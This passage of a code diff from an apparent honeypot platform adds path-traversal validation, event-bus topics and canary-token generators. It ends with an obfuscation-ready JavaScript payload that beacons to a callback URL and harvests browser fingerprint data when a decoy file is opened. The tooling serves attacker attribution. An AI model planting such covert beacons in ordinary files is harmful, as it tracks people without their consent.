/var/lib/decnet/artifacts/{decky}/{service}/{stored_as}
Two callers need to translate ``(decky, stored_as, service)`` into a
concrete ``Path`` rooted under that tree:
* The web router endpoint ``GET /api/v1/artifacts/{decky}/{stored_as}``
(``decnet.web.router.artifacts.api_get_artifact``) — admin-gated
download for the dashboard.
* The TTP ``EmailLifter`` (``decnet.ttp.impl.email_lifter``), which
reads the stored ``.eml`` at tag-time so body-aware predicates
(R0047 BEC, R0048 macro) don't need raw body text on the bus.
Both callers share the same validation rules and the same
defence-in-depth symlink-escape check; this module is the single
implementation. It is auth-agnostic — wrappers layer authentication
where appropriate (the router does ``require_admin``, the lifter does
not).
"""
from __future__ import annotations
import os
import re
from pathlib import Path
# decky names come from the deployer — lowercase alnum plus hyphens.
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
# Services that own an artifacts subdir. Kept explicit so a caller
# can't pivot into arbitrary subpaths via a query string or bus payload.
_ALLOWED_SERVICES = frozenset({"ssh", "smtp"})
# stored_as is assembled by the capturing template as:
# ${ts}_${sha:0:12}_${base}
# where ts is ISO-8601 UTC (e.g. 2026-04-18T02:22:56Z), sha is 12 hex chars,
# and base is the original filename's basename. Keep the filename charset
# tight but allow common punctuation dropped files actually use.
_STORED_AS_RE = re.compile(
r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z_[a-f0-9]{12}_[A-Za-z0-9._-]{1,255}$"
)
# Module-level so tests can monkeypatch. Override via env in production
# (the systemd unit sets this) — the prod path matches the bind mount
# declared in decnet/services/{ssh,smtp}.py.
ARTIFACTS_ROOT = Path(
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
)
class ArtifactPathError(ValueError):
"""Raised when (decky, stored_as, service) fails validation or escapes
the artifacts root.
The router catches this and re-raises HTTPException(400). The lifter
catches it and treats the event as having no body available (no-tag).
"""
def resolve_artifact_path(decky: str, stored_as: str, service: str) -> Path:
"""Validate inputs, resolve the on-disk path, and confirm it stays
inside the artifacts root.
Raises :class:`ArtifactPathError` on any violation. Does NOT check
that the file exists — callers handle that distinctly (404 for the
router, no-tag for the lifter).
"""
if service not in _ALLOWED_SERVICES:
raise ArtifactPathError("invalid service")
if not _DECKY_RE.fullmatch(decky):
raise ArtifactPathError("invalid decky name")
if not _STORED_AS_RE.fullmatch(stored_as):
raise ArtifactPathError("invalid stored_as")
root = ARTIFACTS_ROOT.resolve()
candidate = (root / decky / service / stored_as).resolve()
# defence-in-depth: even though the regexes reject `..`, make sure a
# symlink or weird filesystem state can't escape the root.
if root not in candidate.parents and candidate != root:
raise ArtifactPathError("path escapes artifacts root")
return candidate

129
decnet/artifacts/shards.py Normal file
View File

@@ -0,0 +1,129 @@
"""Shared asciinema shard helpers.
Extracted from ``decnet/web/router/transcripts/api_get_transcript.py``
so non-router callers (the BEHAVE-SHELL session-ended handler in
``decnet/profiler/worker.py``, the collector's session aggregator)
can resolve shard paths without crossing the layer boundary into the
FastAPI router.
Functions here speak in :class:`ValueError` — callers that want HTTP
semantics translate at the boundary. The router wrappers keep their
existing ``HTTPException`` behaviour for backwards compatibility.
PII boundary unchanged: shards live on disk; this module returns
:class:`pathlib.Path` pointers, never byte content. The ``_get_index``
cache stores byte offsets only.
"""
from __future__ import annotations
import os
import re
from collections import OrderedDict
from pathlib import Path
ARTIFACTS_ROOT = Path(
os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts"),
)
_DECKY_RE = re.compile(r"^[a-z0-9][a-z0-9-]{0,62}$")
_SERVICE_RE = re.compile(r"^(ssh|telnet)$")
_SHARD_BASENAME_RE = re.compile(r"^sessions-\d{4}-\d{2}-\d{2}\.jsonl$")
_SID_LINE_RE = re.compile(rb'"sid"\s*:\s*"([a-f0-9-]{36})"')
# (path, mtime_ns) → {sid: [(offset, length), ...]}
_INDEX_CACHE: "OrderedDict[tuple[str, int], dict[str, list[tuple[int, int]]]]" = (
OrderedDict()
)
_CACHE_MAX = 32
def validate_names(decky: str, service: str) -> None:
"""Raise :class:`ValueError` if ``decky`` / ``service`` look forged."""
if not _DECKY_RE.fullmatch(decky):
raise ValueError(f"invalid decky name: {decky!r}")
if not _SERVICE_RE.fullmatch(service):
raise ValueError(f"invalid service: {service!r}")
def resolve_shard(decky: str, service: str, shard_name: str) -> Path:
"""Resolve ``ARTIFACTS_ROOT/{decky}/{service}/transcripts/{shard_name}``
with escape-attempt detection. Raises :class:`ValueError` on
invalid inputs.
"""
validate_names(decky, service)
if not _SHARD_BASENAME_RE.fullmatch(shard_name):
raise ValueError(f"invalid shard name: {shard_name!r}")
root = ARTIFACTS_ROOT.resolve()
candidate = (root / decky / service / "transcripts" / shard_name).resolve()
if root not in candidate.parents and candidate != root:
raise ValueError(f"path escapes artifacts root: {candidate}")
return candidate
def _build_index(path: Path) -> dict[str, list[tuple[int, int]]]:
index: dict[str, list[tuple[int, int]]] = {}
with path.open("rb") as f:
offset = 0
for line in f:
length = len(line)
m = _SID_LINE_RE.search(line)
if m:
sid = m.group(1).decode("ascii")
index.setdefault(sid, []).append((offset, length))
offset += length
return index
def get_index(path: Path) -> tuple[dict[str, list[tuple[int, int]]], int]:
"""Return ``(sid → [(offset, length), …], file_size)``.
Cached by ``(path, mtime_ns)``; rebuilt when the shard changes.
"""
st = path.stat()
key = (str(path), st.st_mtime_ns)
if key in _INDEX_CACHE:
_INDEX_CACHE.move_to_end(key)
return _INDEX_CACHE[key], st.st_size
index = _build_index(path)
_INDEX_CACHE[key] = index
_INDEX_CACHE.move_to_end(key)
while len(_INDEX_CACHE) > _CACHE_MAX:
_INDEX_CACHE.popitem(last=False)
return index, st.st_size
def find_shard_with_sid(decky: str, service: str, sid: str) -> Path | None:
"""Scan every ``sessions-YYYY-MM-DD.jsonl`` under the decky's
transcripts dir until one claims this ``sid``.
Newest shards first — most lookups are for recent sessions. Caches
the per-shard sid index, so repeated calls are ~free until the
shard's mtime changes.
Returns ``None`` when nothing claims the sid OR when the
transcripts dir is missing / unreadable. Never raises on
filesystem-level errors — callers treat ``None`` as "skip".
"""
validate_names(decky, service)
root = ARTIFACTS_ROOT.resolve()
transcripts_dir = (root / decky / service / "transcripts").resolve()
if root not in transcripts_dir.parents:
return None
try:
if not transcripts_dir.is_dir():
return None
entries = list(transcripts_dir.iterdir())
except (OSError, PermissionError):
return None
shards = sorted(
(p for p in entries if _SHARD_BASENAME_RE.fullmatch(p.name)),
reverse=True,
)
for shard in shards:
try:
index, _size = get_index(shard)
except (OSError, PermissionError):
continue
if sid in index:
return shard
return None

View File

@@ -13,7 +13,7 @@ from typing import Sequence
from decnet.asn.base import Provider from decnet.asn.base import Provider
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
from decnet.asn.iptoasn.parse import parse_file from decnet.asn.iptoasn.parse import parse_file
from decnet.asn.lookup import AsnLookup from decnet.asn.lookup import AsnLookup, Range
from decnet.asn.paths import ensure_root from decnet.asn.paths import ensure_root
logger = logging.getLogger("decnet.asn.iptoasn.provider") logger = logging.getLogger("decnet.asn.iptoasn.provider")
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
"asn.iptoasn: cache load failed, rebuilding: %s", exc "asn.iptoasn: cache load failed, rebuilding: %s", exc
) )
ranges = [] ranges: list[Range] = []
for path in self.data_paths(): for path in self.data_paths():
if not path.exists(): if not path.exists():
continue continue

View File

@@ -76,7 +76,7 @@ def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
up at all we no-op. up at all we no-op.
""" """
try: try:
from decnet.telemetry import wrap_repository # type: ignore[attr-defined] from decnet.telemetry import wrap_repository
except ImportError: except ImportError:
return bus return bus
try: try:

View File

@@ -58,7 +58,7 @@ def make_thread_safe_publisher(
contract the rest of this module already upholds. contract the rest of this module already upholds.
""" """
if bus is None: if bus is None:
return lambda _topic, _payload, _event_type="": None return lambda _topic, _payload, _event_type="": None # type: ignore[misc]
def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None: def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
# Stream threads may keep draining after the bus owner closed it # Stream threads may keep draining after the bus owner closed it

View File

@@ -17,6 +17,7 @@ Token structure (NATS-style, dot-separated):
attacker.scored attacker.scored
attacker.session.started attacker.session.started
attacker.session.ended attacker.session.ended
attacker.observation.{primitive}
identity.formed identity.formed
identity.observation.linked identity.observation.linked
identity.merged identity.merged
@@ -28,12 +29,18 @@ Token structure (NATS-style, dot-separated):
campaign.unmerged campaign.unmerged
credential.captured credential.captured
credential.reuse.detected credential.reuse.detected
attribution.profile.state_changed
attribution.profile.multi_actor_suspected
canary.{token_id}.triggered canary.{token_id}.triggered
canary.{token_id}.placed canary.{token_id}.placed
canary.{token_id}.revoked canary.{token_id}.revoked
system.log system.log
system.bus.health system.bus.health
system.{worker}.health system.{worker}.health
email.received
ttp.tagged
ttp.rule.fired.{technique_id}
ttp.rule.suppressed
Wildcards (per :func:`decnet.bus.base.matches`): Wildcards (per :func:`decnet.bus.base.matches`):
@@ -52,8 +59,12 @@ IDENTITY = "identity"
CAMPAIGN = "campaign" CAMPAIGN = "campaign"
SYSTEM = "system" SYSTEM = "system"
CREDENTIAL = "credential" CREDENTIAL = "credential"
ATTRIBUTION = "attribution"
ORCHESTRATOR = "orchestrator" ORCHESTRATOR = "orchestrator"
CANARY = "canary" CANARY = "canary"
SMTP = "smtp"
EMAIL = "email"
TTP = "ttp"
# ─── Leaf event-type constants (the last segment of each topic) ────────────── # ─── Leaf event-type constants (the last segment of each topic) ──────────────
@@ -83,6 +94,19 @@ DECKY_MUTATE_REQUEST = "mutate_request"
# syslog sidechannel too) to interleave substrate-change markers into # syslog sidechannel too) to interleave substrate-change markers into
# attacker traversals. # attacker traversals.
DECKY_MUTATION = "mutation" DECKY_MUTATION = "mutation"
# Per-service add/remove on a deployed decky (live; no full redeploy).
# Payload carries ``decky_name``, ``service_name``, optional
# ``topology_id``, and ``services`` (the post-mutation list). Consumers
# that watch substrate shape (correlator, dashboard, profiler) reconcile
# off these without waiting for the next decnet-state.json snapshot.
DECKY_SERVICE_ADDED = "service_added"
DECKY_SERVICE_REMOVED = "service_removed"
# Per-service config change (the schema-driven Inspector form). Payload
# carries ``decky_name``, ``service_name``, optional ``topology_id``,
# ``service_config`` (the new validated dict), and ``recreated`` — true
# when the operator hit Apply (container was force-recreated to pick up
# the new env), false when they only hit Save (DB-only).
DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
# Attacker event types (second token under the ``attacker`` root). First # Attacker event types (second token under the ``attacker`` root). First
# sighting, session boundary transitions, and score-threshold crossings # sighting, session boundary transitions, and score-threshold crossings
@@ -94,6 +118,14 @@ ATTACKER_SCORED = "scored"
# Distinct from ``observed`` which is the correlator's first-sight signal — # Distinct from ``observed`` which is the correlator's first-sight signal —
# a fingerprint is additional evidence about an already-observed attacker. # a fingerprint is additional evidence about an already-observed attacker.
ATTACKER_FINGERPRINTED = "fingerprinted" ATTACKER_FINGERPRINTED = "fingerprinted"
# Published when the prober observes a NEW hash for an
# (attacker_ip, port, probe_type) triple it has seen before — i.e. the
# attacker rotated their VPS, rebuilt their SSH server, swapped their
# TLS cert. Distinct from ``fingerprinted`` which fires on every probe
# result; ``fingerprint_rotated`` fires only on diff and carries both
# old_hash + new_hash. Producer: prober (via the rotation library);
# consumers: dashboard, forensics, attribution clustering.
ATTACKER_FINGERPRINT_ROTATED = "fingerprint_rotated"
ATTACKER_SESSION_STARTED = "session.started" ATTACKER_SESSION_STARTED = "session.started"
ATTACKER_SESSION_ENDED = "session.ended" ATTACKER_SESSION_ENDED = "session.ended"
# Published by the ``decnet enrich`` worker after an enrichment pass # Published by the ``decnet enrich`` worker after an enrichment pass
@@ -101,6 +133,19 @@ ATTACKER_SESSION_ENDED = "session.ended"
# returned a verdict). Payload carries the aggregate verdict + per- # returned a verdict). Payload carries the aggregate verdict + per-
# provider summary so SIEM-bound webhooks don't need to re-query the DB. # provider summary so SIEM-bound webhooks don't need to re-query the DB.
ATTACKER_INTEL_ENRICHED = "intel.enriched" ATTACKER_INTEL_ENRICHED = "intel.enriched"
# Per-primitive BEHAVE-SHELL observation. Full topic shape:
# attacker.observation.<primitive>
# e.g. ``attacker.observation.motor.input_modality``. Producer:
# ``decnet/profiler/behave_shell/`` (extractor library called from the
# profiler worker on ``attacker.session.ended``); consumers: dashboard
# SSE relay, attribution engine state machine, federation gossip
# (post-v0). See development/BEHAVE-INTEGRATION.md §"Bus topics" for
# the wire-format contract — the prefix is documentation + pattern
# match only; bus auth is socket file perms (DEBT-029 §2), not
# topic-level. The ``primitive`` segment MAY contain dots
# (``motor.shell_mastery.tab_completion``) — the same dotted-leaf
# rule that ``attacker.session.ended`` uses.
ATTACKER_OBSERVATION_PREFIX = "observation"
# Identity-resolution event types (second/third tokens under ``identity``). # Identity-resolution event types (second/third tokens under ``identity``).
# Published by the (future) clusterer worker — see # Published by the (future) clusterer worker — see
@@ -168,6 +213,42 @@ CAMPAIGN_UNMERGED = "unmerged"
CREDENTIAL_CAPTURED = "captured" CREDENTIAL_CAPTURED = "captured"
CREDENTIAL_REUSE_DETECTED = "reuse.detected" CREDENTIAL_REUSE_DETECTED = "reuse.detected"
# Attribution-engine event types (second/third tokens under
# ``attribution``). Published by the v0 attribution worker
# (``decnet.correlation.attribution_worker``) which subscribes to
# ``attacker.observation.>`` and runs the per-(identity, primitive)
# state machine. See ``development/ATTRIBUTION-ENGINE.md``.
#
# attribution.profile.state_changed — per-primitive state
# transition (e.g.
# stable → drifting).
# Payload: identity_uuid,
# primitive, old_state,
# new_state, current_value,
# confidence,
# observation_count, ts.
# attribution.profile.multi_actor_suspected — fires when ≥ 2
# primitives flag the same
# identity as multi_actor
# concurrently. Cross-
# primitive correlator;
# single-primitive
# multi_actor is too noisy
# on its own. Payload:
# identity_uuid, primitives,
# evidence_summary,
# confidence, ts.
#
# These are *derived* signals — distinct from
# ``identity.*`` (clusterer lifecycle, IDENTITY_RESOLUTION.md) and
# ``attacker.observation.*`` (raw extractor envelopes,
# BEHAVE-INTEGRATION.md). The three families compose: observations feed
# the attribution engine, the engine emits derived state, the clusterer
# reads observations + state to form / merge identities.
ATTRIBUTION_PROFILE_PREFIX = "profile"
ATTRIBUTION_PROFILE_STATE_CHANGED = "profile.state_changed"
ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED = "profile.multi_actor_suspected"
# Canary-token event types (third token under ``canary``). # Canary-token event types (third token under ``canary``).
# #
# canary.{token_id}.placed — orchestrator/API successfully planted a # canary.{token_id}.placed — orchestrator/API successfully planted a
@@ -231,6 +312,43 @@ WORKER_CONTROL_START = "start"
# of patterns. Payload is currently empty; consumers only need the signal. # of patterns. Payload is currently empty; consumers only need the signal.
WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed" WEBHOOK_SUBSCRIPTIONS_CHANGED = "system.webhook.subscriptions_changed"
# Email-receipt event — fired by smtp / smtp-relay services on full-message
# receipt (envelope + headers + body + attachments captured). Single-token
# leaf so the bus tokenizer accepts it directly under the ``email`` root.
# Consumed by the TTP ``email_lifter`` for header / body-pattern / attachment
# rules. PII rule (TTP_TAGGING.md "Hard parts §6"): payload carries hashes,
# counts, header names, and rcpt-domain sets — never rcpt addresses or body
# bytes.
EMAIL_RECEIVED = "received"
# TTP-tagging event types (second/third tokens under ``ttp``).
#
# ttp.tagged — one or more new tags written. Published
# only when ``INSERT OR IGNORE`` wrote at
# least one new row; idempotent
# re-evaluations publish nothing
# (loop-prevention invariant — see
# TTP_TAGGING.md).
# ttp.rule.fired.{technique_id} — per-technique fan-out for SIEM
# consumers that subscribe to a single
# technique. Topic key is the parent
# technique; sub_technique is in the
# payload. Built via :func:`ttp_rule_fired`.
# ttp.rule.suppressed — rule fired but the tag was dropped
# (confidence below floor, rate-limited,
# or the rule's RuleState was disabled).
# Observability signal for the dashboard.
#
# Per-rule reload + state-change topics. Built via
# :func:`ttp_rule_reloaded` / :func:`ttp_rule_state`; SIEM consumers
# subscribe to ``ttp.rule.reloaded.>`` (every rule) or
# ``ttp.rule.reloaded.R0001`` (one rule) at their preferred granularity.
TTP_TAGGED = "tagged"
TTP_RULE_FIRED = "rule.fired"
TTP_RULE_SUPPRESSED = "rule.suppressed"
TTP_RULE_RELOADED = "rule.reloaded"
TTP_RULE_STATE = "rule.state"
# ─── Builders ──────────────────────────────────────────────────────────────── # ─── Builders ────────────────────────────────────────────────────────────────
@@ -301,6 +419,42 @@ def attacker(event_type: str) -> str:
return f"{ATTACKER}.{event_type}" return f"{ATTACKER}.{event_type}"
def attacker_observation(primitive: str) -> str:
"""Build ``attacker.observation.<primitive>``.
*primitive* is the fully-qualified BEHAVE-SHELL primitive path
(e.g. ``motor.input_modality``,
``cognitive.feedback_loop_engagement``,
``motor.shell_mastery.tab_completion``). Dotted primitives are
permitted — this matches the format
``behave_shell.spec.event_adapter.event_topic_for`` produces
upstream, and DECNET's bus admits the dotted leaf the same way
:func:`attacker` does for ``session.started``.
Empty string is rejected so a downstream typo doesn't ship as
``attacker.observation.``.
"""
if not primitive:
raise ValueError(
"attacker_observation topic requires a non-empty primitive",
)
return f"{ATTACKER}.{ATTACKER_OBSERVATION_PREFIX}.{primitive}"
def attribution(event_type: str) -> str:
"""Build ``attribution.<event_type>``.
*event_type* is typically one of
:data:`ATTRIBUTION_PROFILE_STATE_CHANGED` or
:data:`ATTRIBUTION_PROFILE_MULTI_ACTOR_SUSPECTED` — both contain a
dot (``profile.state_changed``) which is permitted under the same
"trailing dotted leaf" rule that ``attacker.session.started`` uses.
"""
if not event_type:
raise ValueError("attribution topic requires a non-empty event_type")
return f"{ATTRIBUTION}.{event_type}"
def campaign(event_type: str) -> str: def campaign(event_type: str) -> str:
"""Build ``campaign.<event_type>``. """Build ``campaign.<event_type>``.
@@ -381,6 +535,86 @@ def system_control(worker: str) -> str:
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}" return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
def smtp(event_type: str) -> str:
"""Build ``smtp.<event_type>``.
*event_type* may contain dots (e.g. ``probe.pending``).
"""
if not event_type:
raise ValueError("smtp topic requires a non-empty event_type")
return f"{SMTP}.{event_type}"
def email_topic(event_type: str) -> str:
"""Build ``email.<event_type>``.
Named ``email_topic`` rather than ``email`` to avoid shadowing the
Python ``email`` stdlib package at import sites that pull both.
*event_type* is typically :data:`EMAIL_RECEIVED`.
"""
if not event_type:
raise ValueError("email topic requires a non-empty event_type")
return f"{EMAIL}.{event_type}"
def ttp(event_type: str) -> str:
"""Build ``ttp.<event_type>``.
*event_type* is typically one of :data:`TTP_TAGGED`,
:data:`TTP_RULE_FIRED`, or :data:`TTP_RULE_SUPPRESSED`. Dotted
leaves (``rule.fired``) are permitted — same rationale as
:func:`system`. For per-technique fan-out use
:func:`ttp_rule_fired`.
"""
if not event_type:
raise ValueError("ttp topic requires a non-empty event_type")
return f"{TTP}.{event_type}"
def ttp_rule_fired(technique_id: str) -> str:
"""Build ``ttp.rule.fired.<technique_id>``.
Per-technique fan-out: SIEM subscribers can listen on
``ttp.rule.fired.>`` for everything, ``ttp.rule.fired.T1110`` for
one technique. *technique_id* is validated as a single segment —
sub-techniques like ``T1110.001`` are rejected because they would
split into two tokens. The topic key is the parent technique;
``sub_technique_id`` lives in the payload.
"""
_reject_tokens(technique_id)
return f"{TTP}.rule.fired.{technique_id}"
def ttp_rule_reloaded(rule_id: str) -> str:
"""Build ``ttp.rule.reloaded.<rule_id>``.
Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
when a rule's *definition* changes (YAML edit on the filesystem
backend, ``ttp_rule`` row update on the database backend). One event
per per-rule edit — never batched (the "incremental, never batched"
property in TTP_TAGGING.md §"Bus topics" inherits its granularity
from :meth:`RuleStore.subscribe_changes`).
Subscribers: ``ttp.rule.reloaded.>`` for every rule,
``ttp.rule.reloaded.R0001`` for one. *rule_id* is validated as a
single segment.
"""
_reject_tokens(rule_id)
return f"{TTP}.{TTP_RULE_RELOADED}.{rule_id}"
def ttp_rule_state(rule_id: str) -> str:
"""Build ``ttp.rule.state.<rule_id>``.
Per-rule fan-out fired by the :class:`~decnet.ttp.store.base.RuleStore`
when a rule's *operational state* changes (operator hits the disable
button, an ``expires_at`` TTL fires and auto-reverts the state).
*rule_id* is validated as a single segment.
"""
_reject_tokens(rule_id)
return f"{TTP}.{TTP_RULE_STATE}.{rule_id}"
def _reject_tokens(*parts: str) -> None: def _reject_tokens(*parts: str) -> None:
"""Reject topic segments that would break NATS-style tokenization. """Reject topic segments that would break NATS-style tokenization.

View File

@@ -0,0 +1,18 @@
// Node helper invoked by decnet.canary.obfuscator.
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
// Kept dependency-light on purpose: only javascript-obfuscator.
const JsObf = require('javascript-obfuscator');
let raw = '';
process.stdin.setEncoding('utf8');
process.stdin.on('data', (chunk) => { raw += chunk; });
process.stdin.on('end', () => {
try {
const { code, options } = JSON.parse(raw);
const result = JsObf.obfuscate(code, options || {});
process.stdout.write(result.getObfuscatedCode());
} catch (e) {
process.stderr.write(String(e && e.stack || e));
process.exit(2);
}
});

View File

@@ -100,6 +100,12 @@ class CanaryArtifact:
planting. Never leaked to the attacker-facing surface. planting. Never leaked to the attacker-facing surface.
""" """
fingerprint_nonce: Optional[str] = None
"""Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
so the worker can validate incoming ``?k=`` params.
"""
class CanaryGenerator(ABC): class CanaryGenerator(ABC):
"""Produces a fake artifact from scratch.""" """Produces a fake artifact from scratch."""

View File

@@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx", ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf", ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump", ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
} }
@@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = {
"honeydoc_pdf": "http", "honeydoc_pdf": "http",
"ssh_key": "dns", # trip is DNS resolution of host comment "ssh_key": "dns", # trip is DNS resolution of host comment
"mysql_dump": "dns", # trip is DNS resolution of subdomain "mysql_dump": "dns", # trip is DNS resolution of subdomain
"fingerprint_html": "http", # obfuscated JS beacons GET /c/<slug>
"fingerprint_svg": "http", # same, embedded inside SVG <script>
} }
@@ -78,6 +82,8 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx", ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf", ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql", ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
} }
@@ -136,10 +142,12 @@ async def cultivate(
) )
callback_token = _new_callback_token() callback_token = _new_callback_token()
http_base_str: str = http_base or os.environ.get("DECNET_CANARY_HTTP_BASE") or ""
dns_zone_str: str = dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE") or ""
ctx = CanaryContext( ctx = CanaryContext(
callback_token=callback_token, callback_token=callback_token,
http_base=http_base or os.environ.get("DECNET_CANARY_HTTP_BASE", ""), http_base=http_base_str,
dns_zone=dns_zone or os.environ.get("DECNET_CANARY_DNS_ZONE", ""), dns_zone=dns_zone_str,
persona="linux", # all our deckies are POSIX in MVP persona="linux", # all our deckies are POSIX in MVP
) )
generator = get_generator(gen_name) generator = get_generator(gen_name)
@@ -154,7 +162,7 @@ async def cultivate(
# attribute a callback if the artifact trips during the plant # attribute a callback if the artifact trips during the plant
# itself (improbable but possible — DOCX viewers can preview # itself (improbable but possible — DOCX viewers can preview
# autoplay-style). # autoplay-style).
await repo.create_canary_token({ token_data: dict = {
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"), "kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
"decky_name": plan.decky_name, "decky_name": plan.decky_name,
"instrumenter": None, "instrumenter": None,
@@ -165,7 +173,10 @@ async def cultivate(
"placed_at": datetime.now(timezone.utc), "placed_at": datetime.now(timezone.utc),
"created_by": created_by, "created_by": created_by,
"state": "planted", "state": "planted",
}) }
if artifact.fingerprint_nonce is not None:
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
await repo.create_canary_token(token_data)
# Carry the placement_path on the artifact so the orchestrator's # Carry the placement_path on the artifact so the orchestrator's
# plant_file call uses it. We don't mutate the generator's # plant_file call uses it. We don't mutate the generator's

View File

@@ -131,7 +131,7 @@ def _build_response(
question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass) question = qname_bytes + struct.pack("!HH", query.qtype, query.qclass)
answer = b"" answer = b""
if an_count: if an_count and answer_ip is not None:
# Use a name pointer back to the question (offset 12). # Use a name pointer back to the question (offset 12).
ptr = struct.pack("!H", 0xC000 | 12) ptr = struct.pack("!H", 0xC000 | 12)
rdata = bytes(int(o) for o in answer_ip.split(".")) rdata = bytes(int(o) for o in answer_ip.split("."))
@@ -169,10 +169,10 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
self._answer_ip = answer_ip self._answer_ip = answer_ip
self._transport: Optional[asyncio.DatagramTransport] = None self._transport: Optional[asyncio.DatagramTransport] = None
def connection_made(self, transport) -> None: # type: ignore[override] def connection_made(self, transport) -> None:
self._transport = transport # type: ignore[assignment] self._transport = transport
def datagram_received( # type: ignore[override] def datagram_received(
self, data: bytes, addr: Tuple[str, int], self, data: bytes, addr: Tuple[str, int],
) -> None: ) -> None:
try: try:
@@ -190,7 +190,7 @@ class CanaryDNSProtocol(asyncio.DatagramProtocol):
return return
# Known name — answer with our sinkhole IP, then fire the hook. # Known name — answer with our sinkhole IP, then fire the hook.
self._send(addr, _build_response(query, answer_ip=self._answer_ip)) self._send(addr, _build_response(query, answer_ip=self._answer_ip))
asyncio.create_task(self._hook(slug, query, addr[0])) asyncio.ensure_future(self._hook(slug, query, addr[0]))
def _slug_for(self, qname: str) -> Optional[str]: def _slug_for(self, qname: str) -> Optional[str]:
if not self._zone or not qname.endswith(self._suffix): if not self._zone or not qname.endswith(self._suffix):

View File

@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
"honeydoc_docx", "honeydoc_docx",
"honeydoc_pdf", "honeydoc_pdf",
"mysql_dump", "mysql_dump",
"fingerprint_html",
"fingerprint_svg",
) )
KNOWN_INSTRUMENTERS: Tuple[str, ...] = ( KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
if name == "mysql_dump": if name == "mysql_dump":
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
return MySQLDumpGenerator() return MySQLDumpGenerator()
if name == "fingerprint_html":
from decnet.canary.generators.fingerprint_html import (
FingerprintHtmlGenerator,
)
return FingerprintHtmlGenerator()
if name == "fingerprint_svg":
from decnet.canary.generators.fingerprint_svg import (
FingerprintSvgGenerator,
)
return FingerprintSvgGenerator()
raise ValueError( raise ValueError(
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}" f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
) )

View File

@@ -0,0 +1,291 @@
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
// canary, harvests browser primitives, and beacons the result back to the
// canary worker. Ported from canary-self-test.html with the rendering UI
// stripped out.
//
// Three placeholders are substituted by the Python builder BEFORE
// javascript-obfuscator runs:
//
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
//
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
// then a fingerprint payload sent as a base64-URL query param on a second
// GET so the existing worker records the hit even before step-4 POST
// support lands. Both fail-open: any error short-circuits to next step.
(async function () {
var BEACON_URL = "{{BEACON_URL}}";
var MINT_UUID = "{{MINT_UUID}}";
var MINT_NONCE = "{{MINT_NONCE}}";
var fp = { mint: MINT_UUID };
function fire(url) {
try {
var img = new Image();
img.src = url;
} catch (e) { /* swallow */ }
}
// 1) bare-open beacon — fires regardless of whether the rest succeeds
fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
function sha256(str) {
var buf = new TextEncoder().encode(str);
return crypto.subtle.digest("SHA-256", buf).then(function (h) {
return Array.from(new Uint8Array(h))
.map(function (b) { return b.toString(16).padStart(2, "0"); })
.join("");
});
}
// navigator
try {
fp.nav = {
ua: navigator.userAgent,
pl: navigator.platform,
lg: navigator.language,
lgs: (navigator.languages || []).join(","),
ck: navigator.cookieEnabled,
dnt: navigator.doNotTrack,
